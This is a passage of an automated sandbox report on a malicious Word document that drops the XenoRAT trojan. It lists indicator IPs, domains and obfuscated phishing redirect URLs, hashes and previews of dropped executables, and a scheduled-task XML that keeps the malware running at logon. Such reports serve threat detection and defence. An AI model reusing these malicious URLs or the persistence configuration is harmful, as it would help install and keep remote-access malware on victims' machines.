	{ "brands": "unknown" }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
87.120.120.27	gjot5vxpIC.exe	Get hash	malicious	XenoRAT	Browse
87.121.86.205	Outstanding_Payment.vbs	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.stipamana.com	Outstanding_Payment.vbs	Get hash	malicious	Unknown	Browse	87.121.86.205
www.stipamana.com	Pago.doc	Get hash	malicious	Lokibot	Browse	45.149.241.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKATTV-ASBG	Outstanding_Payment.vbs	Get hash	malicious	Unknown	Browse	87.121.86.205
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	87.121.86.105
	RHxJqGoGFB.exe	Get hash	malicious	Sality	Browse	94.156.127.59
	yVVZdG2NJX.exe	Get hash	malicious	GuLoader	Browse	87.121.86.8
	https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub	Get hash	malicious	Unknown	Browse	87.121.86.72
	http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkve	Get hash	malicious	Unknown	Browse	87.121.86.72
	[EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.eml	Get hash	malicious	Unknown	Browse	87.121.86.72
	o4QEzeCniw.exe	Get hash	malicious	Unknown	Browse	87.120.237.130
	Payment Order #00004647.exe	Get hash	malicious	XWorm	Browse	87.121.86.8
	https://www.google.pl/url?url=http://msulrmrdjzsckgcdargfhi.com&nbq=tspwcyd&idbzok=wua&nbnak=ambmgo&lwf=vngmsem&q=amp/jdsra7r.ldn%C2%ADf%C2%ADpwlywydkjq%C2%ADuh%C2%ADf%C2%ADx%C2%AD.com/ufpd3kprb&xssr=zrcbvya&bhrswcv=abqvczic&clvu=wotwqzi&umasmoc=lhibfmio&tgek=sdcrupi&bpcjeel=qvmnlgnn&eign=czorcvw&txcfkja=lhtluzhk&zkmb=joyrkbk&mspp=frbfplx&ohrxtnn=emgsiphv&cbqf=eyyxrom&ngreupz=nzdjgaue&xtpz=fvqzpcq&spvwwuv=vijpphwi&wrjj=pklwpte&uuahvww=saaddjqz	Get hash	malicious	Unknown	Browse	87.121.86.72
UNACS-AS-BG8000BurgasBG	gjot5vxpIC.exe	Get hash	malicious	XenoRAT	Browse	87.120.120.27
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Stealc, Vidar	Browse	87.120.125.31
	po4877383.exe	Get hash	malicious	RedLine	Browse	87.120.120.86
	e824975.html	Get hash	malicious	Unknown	Browse	87.120.114.172
	qqig1mHX8U.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse	87.120.125.217
	RFQ LIST 767655776478637584637865763478634365634444444444444444453.exe	Get hash	malicious	GuLoader	Browse	87.120.114.159
	New listed items 7648767856387547354734567465647568487.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	87.120.114.159
	file.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	87.120.113.179
	https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub	Get hash	malicious	Unknown	Browse	87.120.114.172

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	FR65 380 071 464.docx	Get hash	malicious	Unknown	Browse	87.121.86.205
	Pago.doc	Get hash	malicious	Lokibot	Browse	87.121.86.205
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	87.121.86.205
	Pago.doc	Get hash	malicious	Lokibot	Browse	87.121.86.205
	Amoxycillin Trihydrate Powder.docx.doc	Get hash	malicious	Remcos	Browse	87.121.86.205
	#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx	Get hash	malicious	Remcos	Browse	87.121.86.205
	Structural_Design_Proposal.docx.doc	Get hash	malicious	Unknown	Browse	87.121.86.205
	captcha.hta	Get hash	malicious	Unknown	Browse	87.121.86.205
	4z0JKnfc8L.xlsx	Get hash	malicious	Unknown	Browse	87.121.86.205
	MOaSkQR8WU.xlsx	Get hash	malicious	Unknown	Browse	87.121.86.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe	gjot5vxpIC.exe	Get hash	malicious	XenoRAT	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	gjot5vxpIC.exe	Get hash	malicious	XenoRAT	Browse
C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	gjot5vxpIC.exe	Get hash	malicious	XenoRAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	169984
Entropy (8bit):	7.755998218282918
Encrypted:	false
SSDEEP:	3072:XdkwdXAqPEHTJJuVqhHjFV2xEEbh9pKP2qYCp65nTGsAeXy0fkd:XmwBAQeVmWHHePH02qYCp6NGsAeXy9d
MD5:	F44302503EA4EEDFA831C25711DF51B7
SHA1:	127D6EC83904DE48D90C293E53C905FC4206BFB8
SHA-256:	21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
SHA-512:	71E9512244D864B53ABF436B496A53E6771135CC7D5FC0E4DF7D04AC23074B6ED1E7438A28BC232A70F57DE97367F0E3A21925BED738C5E47BDF3487AB2F4E03
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Joe Sandbox View:	Filename: gjot5vxpIC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rg................................. ........@.. ....................................`.................................X...S.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........G...V...........................................................N5.WSS...Yf...W.k....R.qpP.....g.,R.........;I) ...`.5.8S...hP.B._I...'...&.^...M..kA}........'..9.....Y!>"....o.4!....0......]u...G.#].1.Y.\.N..\.N.m...\|t.y............_......7..T&.x......9...oZ..q.^.%...AE.}..$...T...?-....`........".K.5........')...k.DW.q....-r._D.....9.=..&."....'.L'..j.\...MO.c.;.9..\|......+H0!...H ...Q....=C.)..n.d....~....6......\.H...I!...5.3..5b..R

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	23040
Entropy (8bit):	5.203625381779583
Encrypted:	false
SSDEEP:	192:mtuZ/RHSmafzwXawd8/jNVf5Ajv0WWBDrTJNppT0jAOQkf:mt6/5SrzyjkjvhEGzpt0jAx
MD5:	9E62AFB9002305C9D9772ABB3DDBDEFB
SHA1:	456AA3F7296365EB7FB05FC505D13235822147E9
SHA-256:	F7693595A854E59BD69F8133111F78C51E57DD9B50B8F3D8A1167C9AD4734D79
SHA-512:	E5830CCE385CB7A2DCBA4F67D5C5736C2808C68625ACD898C3E5A266D9A720C1C8E15A4CF7C8D7CADF6754DF81C1EE4F7DAB532BB8D52903822A8F1AC1AE96BB
Malicious:	false
Preview:	......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................+...........*........................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{79847720-215F-4E11-8E77-239CB6350007}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6A67.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1055
Entropy (8bit):	3.897047042709015
Encrypted:	false
SSDEEP:	12:FLJ+DW2SFFkFmMMLGId1L6AEJl7XpShhJKShe/Q0QK1++EHSuVPoldxv3n:FLJ+S3Mmd1L6ztMhEMOQ0Q+5uVqxvn
MD5:	6945121BDCFC1DA5E63298A232BA8070
SHA1:	CFA8B949E1C52A1869BC86CDD45AF624E7E3B81C
SHA-256:	7F94A998F6790624169C23B6B8CD5F55DD9D4722F052B1FC22075593B8A373CB
SHA-512:	66A9ABC648CB79FAD282AF2A593D8FE2954F353EEA01D1730699204275EC77B2B0D9F0CDAC33A9E257913202AC48904C018911BCC0A0984AA22D9B828B0548C9
Malicious:	true
Preview:	. <Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id='Author'>. <LogonType>InteractiveToken</LogonType>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. </Settings>. <Actions>. <Exec>. <Command>C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe</Command>. </Exe

C:\Users\user\AppData\Local\Temp\~DF030A54EA5482529A.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF196F33B581CC37E5.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD52EF57B95502016.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.564801159450685
Encrypted:	false
SSDEEP:	3:M1d4Kxru4om4FJyKxru4ov:MMc64Rc64y
MD5:	3C04C1B4545BF32347FCF8083CEB8A94
SHA1:	DD273BF7E26C3B3D81AB03367A4BE8D4436FCA0A
SHA-256:	478CFF52B227E4CB03EA33113204509CD3B44AFB72C9D7E51025C703418F1BB6
SHA-512:	7BD8B23E56555D28CE8A0C0487E084A46501A1E1965834E6D9959E217BDB52308EAA2075C081E63179A28ED4072E8173D1273AE4E4D2CB05B7D16E9C5B6634DA
Malicious:	false
Preview:	[doc]..yIla7SeJ6r.LNK=0..[folders]..yIla7SeJ6r.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\yIla7SeJ6r.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Fri Dec 6 08:29:42 2024, length=51200, window=hide
Category:	dropped
Size (bytes):	1014
Entropy (8bit):	4.527932343860956
Encrypted:	false
SSDEEP:	12:8tr8FgXg/XAlCPCHaXJzBAnB/5YXX+WgdgcuoNrdnicvbsa9evd5DtZ3YilMMEpz:8+/XTJi4XBukeh9IrDv3qNA57u
MD5:	547ADF3AA2F9AFAF2788E56E80F4A258
SHA1:	B70FC7AC3856C22AFD70BAAC3C56064018642110
SHA-256:	585ADC478354C1F0163BA942C52F3363F41C740272170E92C1D354A790A21B8A
SHA-512:	F76676DA40F68D7517AC9CDB029FDCA07BB5CFAB7F32A6F9EED17F5198CBEB00884B86EF2D786EEDC6DC768D8F1111D84F7E565F107D2AF9F3B2482C326F46E6
Malicious:	false
Preview:	L..................F.... .....X.r.....X.r......a.G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Y.K..user.8......QK.X.Y.K...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2......Y.K .YILA7S~1.DOC..J.......WD..WD..........................y.I.l.a.7.S.e.J.6.r...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\yIla7SeJ6r.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.y.I.l.a.7.S.e.J.6.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0809.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	169984
Entropy (8bit):	7.755998218282918
Encrypted:	false
SSDEEP:	3072:XdkwdXAqPEHTJJuVqhHjFV2xEEbh9pKP2qYCp65nTGsAeXy0fkd:XmwBAQeVmWHHePH02qYCp6NGsAeXy9d
MD5:	F44302503EA4EEDFA831C25711DF51B7
SHA1:	127D6EC83904DE48D90C293E53C905FC4206BFB8
SHA-256:	21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
SHA-512:	71E9512244D864B53ABF436B496A53E6771135CC7D5FC0E4DF7D04AC23074B6ED1E7438A28BC232A70F57DE97367F0E3A21925BED738C5E47BDF3487AB2F4E03
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Joe Sandbox View:	Filename: gjot5vxpIC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rg................................. ........@.. ....................................`.................................X...S.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........G...V...........................................................N5.WSS...Yf...W.k....R.qpP.....g.,R.........;I) ...`.5.8S...hP.B._I...'...&.^...M..kA}........'..9.....Y!>"....o.4!....0......]u...G.#].1.Y.\.N..\.N.m...\|t.y............_......7..T&.x......9...oZ..q.^.%...AE.}..$...T...?-....`........".K.5........')...k.DW.q....-r._D.....9.=..&."....'.L'..j.\...MO.c.;.9..\|......+H0!...H ...Q....=C.)..n.d....~....6......\.H...I!...5.3..5b..R

C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	169984
Entropy (8bit):	7.755998218282918
Encrypted:	false
SSDEEP:	3072:XdkwdXAqPEHTJJuVqhHjFV2xEEbh9pKP2qYCp65nTGsAeXy0fkd:XmwBAQeVmWHHePH02qYCp6NGsAeXy9d
MD5:	F44302503EA4EEDFA831C25711DF51B7
SHA1:	127D6EC83904DE48D90C293E53C905FC4206BFB8
SHA-256:	21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
SHA-512:	71E9512244D864B53ABF436B496A53E6771135CC7D5FC0E4DF7D04AC23074B6ED1E7438A28BC232A70F57DE97367F0E3A21925BED738C5E47BDF3487AB2F4E03
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Joe Sandbox View:	Filename: gjot5vxpIC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rg................................. ........@.. ....................................`.................................X...S.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........G...V...........................................................N5.WSS...Yf...W.k....R.qpP.....g.,R.........;I) ...`.5.8S...hP.B._I...'...&.^...M..kA}........'..9.....Y!>"....o.4!....0......]u...G.#].1.Y.\.N..\.N.m...\|t.y............_......7..T&.x......9...oZ..q.^.%...AE.}..$...T...?-....`........".K.5........')...k.DW.q....-r._D.....9.=..&."....'.L'..j.\...MO.c.;.9..\|......+H0!...H ...Q....=C.)..n.d....~....6......\.H...I!...5.3..5b..R

C:\Users\user\Desktop\yIla7SeJ6r.doc (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Fri Dec 6 10:13:00 2024, Last Saved Time/Date: Fri Dec 6 09:30:00 2024, Number of Pages: 1, Number of Words: 2, Number of Characters: 16, Security: 0
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	5.126263399348965
Encrypted:	false
SSDEEP:	384:YbfFAhRp/6j1dhUsQGlWmxDJzkpiSY5UL4bLxEt6/5RrzyjkjvhEGzpgh60jAx:wKhHi3KnCWmHzk7gXRlFEOp3
MD5:	2858F7DFA6B6B41F350A1F4FCF020333
SHA1:	99839B2A1A9706079D44D9405D7CB2F1111A2EDF
SHA-256:	CD97D9112D21255A5DE8BA3F7DD0628CF0728C656169468794CF6A919645D112
SHA-512:	57C7A4A776D64705FA7CCD1A105DAF2BA3E037C84B351B5903E989F6AB0871FE152034AA0B2A01586250FDA572EEABE58FE4E3E17DAE8EB27141E4F512ABD69C
Malicious:	true
Preview:	......................>.......................7...........:...............6......................................................................................................................................................................................................................................................................................................................................................................................................................................................y.............................bjbj...............................{...{....................................................................................6.......6...........................................................................................................-...f...................................................................'...................................................$...........E...>.........................................................................

C:\Users\user\Desktop\~$la7SeJ6r.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\Desktop\~WRD0000.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Fri Dec 6 10:13:00 2024, Last Saved Time/Date: Fri Dec 6 09:30:00 2024, Number of Pages: 1, Number of Words: 2, Number of Characters: 16, Security: 0
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	5.126263399348965
Encrypted:	false
SSDEEP:	384:YbfFAhRp/6j1dhUsQGlWmxDJzkpiSY5UL4bLxEt6/5RrzyjkjvhEGzpgh60jAx:wKhHi3KnCWmHzk7gXRlFEOp3
